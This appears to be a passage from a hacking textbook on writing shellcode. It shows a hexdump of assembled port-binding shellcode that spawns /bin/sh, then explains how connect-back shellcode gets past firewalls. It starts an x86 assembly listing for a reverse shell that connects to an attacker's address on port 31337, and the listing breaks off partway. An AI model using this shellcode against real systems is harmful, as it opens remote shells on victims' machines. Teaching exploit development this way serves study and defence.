Graphics Programs Reference
In-Depth Information
reader@hacking:~/booksrc $ nasm bind_shell.s
reader@hacking:~/booksrc $ hexdump -C bind_shell
00000000 6a 66 58 99 31 db 43 52 6a 01 6a 02 89 e1 cd 80 |jfX.1.CRj.j.....|
00000010 96 6a 66 58 43 52 66 68 7a 69 66 53 89 e1 6a 10 |.jfXCRfhzifS..j.|
00000020 51 56 89 e1 cd 80 b0 66 43 43 53 56 89 e1 cd 80 |QV.....fCCSV....|
00000030 b0 66 43 52 52 56 89 e1 cd 80 93 6a 02 59 b0 3f |.fCRRV.....j.Y.?|
00000040 cd 80 49 79 f9 b0 0b 52 68 2f 2f 73 68 68 2f 62 |..Iy...Rh//shh/b|
00000050 69 6e 89 e3 52 89 e2 53 89 e1 cd 80 |in..R..S....|
0000005c
reader@hacking:~/booksrc $ diff bind_shell portbinding_shellcode
0x550
Connect-Back Shellcode
Port-binding shellcode is easily foiled by firewalls. Most firewalls will block
incoming connections, except for certain ports with known services. This limits
the user's exposure and will prevent port-binding shellcode from receiving a
connection. Software firewalls are now so common that port-bind shellcode
has little chance of actually working in the wild.
However, firewalls typically do not filter outbound connections, since that
would hinder usability. From inside the firewall, a user should be able to access
any web page or make any other outbound connections. This means that if
the shellcode initiates the outbound connection, most firewalls will allow it.
Instead of waiting for a connection from an attacker, connect-back shell-
code initiates a TCP connection back to the attacker's IP address. Opening a
TCP connection only requires a call to
socket()
and a call to
connect()
. This is
very similar to the bind-port shellcode, since the socket call is exactly the same
and the
connect()
call takes the same type of arguments as
bind()
. The following
connect-back shellcode was made from the bind-port shellcode with a few
modifications (shown in bold).
connectback_shell.s
BITS 32
; s = socket(2, 1, 0)
push BYTE 0x66 ; socketcall is syscall #102 (0x66).
pop eax
cdq ; Zero out edx for use as a null DWORD later.
xor ebx, ebx ; ebx is the type of socketcall.
inc ebx ; 1 = SYS_SOCKET = socket()
push edx ; Build arg array: { protocol = 0,
push BYTE 0x1 ; (in reverse) SOCK_STREAM = 1,
push BYTE 0x2 ; AF_INET = 2 }
mov ecx, esp ; ecx = ptr to argument array
int 0x80 ; After syscall, eax has socket file descriptor.
xchg esi, eax ; Save socket FD in esi for later.
; connect(s, [2, 31337, <IP address>], 16)
push BYTE 0x66 ; socketcall (syscall #102)
